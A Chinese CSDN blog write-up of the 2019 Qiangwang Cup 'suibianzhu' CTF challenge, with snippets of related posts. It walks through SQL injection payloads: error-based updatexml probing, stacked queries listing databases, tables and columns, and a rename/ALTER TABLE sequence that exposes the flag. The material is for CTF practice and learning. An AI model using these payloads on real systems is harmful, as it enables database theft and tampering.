强网杯2019 随便注

最新推荐文章于 2024-08-30 14:08:50 发布
最新推荐文章于 2024-08-30 14:08:50 发布
阅读量176 收藏 5
点赞数 4
文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lht2004/article/details/140803122
版权

首先输入单引号测试  1'

得到是由双引号包裹的

尝试输入恒等式,堆叠注入,显示页面均相同

尝试爆库名  1' and updatexml(1,concat(0x7e,database(),0x7e),1) #   

发现select被过滤了,这样联合注入,报错注入,布尔注入,时间注入都没法生效

我们可以尝试堆叠注入

通过堆叠注入获取数据库   1';show databases;

爆出表名    1 ';show tables;

尝试爆出列名    1';show columns from `1919810931114514`;    (查询的表名如果全为数字要用反引号)

查询一下另一张表

由于slsect被禁用,查了一下发现可以通过修改表名来实现查询
1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);#

之后使用恒等式  1' or 1=1 #  得到

xcc7
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 783
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
【BUUCTF】强网杯 2019随便1 write up
GZWZ_的博客
04-06 4849
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
[CTF]强网杯2019随便
凉水的博客
10-16 353
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之类的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
[强网杯 2019]随便
m0_56691564的博客
11-30 2739
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
强网杯 2019 随便
Misaka10046的博客
07-05 268
首先尝试直接去入,发现好像并没有什么用 尝试使用union盲,preg_match() 函数可以根据正则表达式对字符串进行搜索匹配,发现全被禁了,所以排除union入 使用show,发现可以查看表名 使用desc指令分别去查看这两个表结构的详细信息,这里1919810931114514这个表名必须要使用括起来。 因为发现这里过滤了很多函数,因此考虑怎么去绕过。 这里采用了预处理的语句。先把 select * from ` 1919810931114514 `,通过16进制编码变成一串数字
(转载)强网杯2019 随便
yingyugo的博客
11-24 233
虽然题目做得不多但是工具这题考察的知识面很广 尝试入: 1,测试 1’ or 1=1 # ,初步判定存在SQL入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union入,回显了过滤的关键字。 1’ union select 1,2# 然后就是今天学会的新姿势“堆叠入”了。 原理很简单,就是通过 ; 号入多条SQL语句。 先通过show databases爆出数据库。 0'; show databases; # 然后
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
[强网杯 2019]随便 1
tomatoff的博客
03-14 2840
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
buuoj强网杯2019随便
qq_43619533的博客
12-07 1642
buuoj强网杯2019随便 打开环境: 查看源码: 说明sqlmap行不通。 返回页面 依次输入: 1 1' 1' # 1’ order by 2 # 发现可以正常显示,入题,并且爆出了字段数。 输入select return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 过滤掉了这些...
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 387
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
PostgreSQL遍历所有的表并为其创建基于某个字段的索引
致力于互联网、物联网领域知识内容分享
08-29 359
以下以"collect_time"字段为例,其他字段请自行全局替换。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 197
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
PostgreSQL-物理备份工具PGbackrest使用教程
侯晓阳的博客
08-27 439
PGSQL非常强大的物理备份工具,pgbackrest,支持增量、压缩、从库备份远程备份、加密备份等。
Vue + Spring Boot + SQL Server + Python 部署到 Windows 服务器
最新发布
哪有什么合适不合适的博客
08-30 358
这些步骤帮助你在 Windows 服务器上完整地部署 Vue + Spring Boot + SQL Server + Python 应用,并确保在任意电脑上通过访问 IP 或域名可以访问到应用。如果后期需要外网访问,可能需要进一步配置防火墙、公网 IP、域名等。
SQL 入新视角:堆查询、JSON 与头部 XFF 入剖析及防范
2301_77160226的博客
08-27 2083
SQL 入攻击的世界中,除了一些常见的入方式外,还有堆查询入、JSON 入以及头部 XFF 入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 入攻击方式的原理和特点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值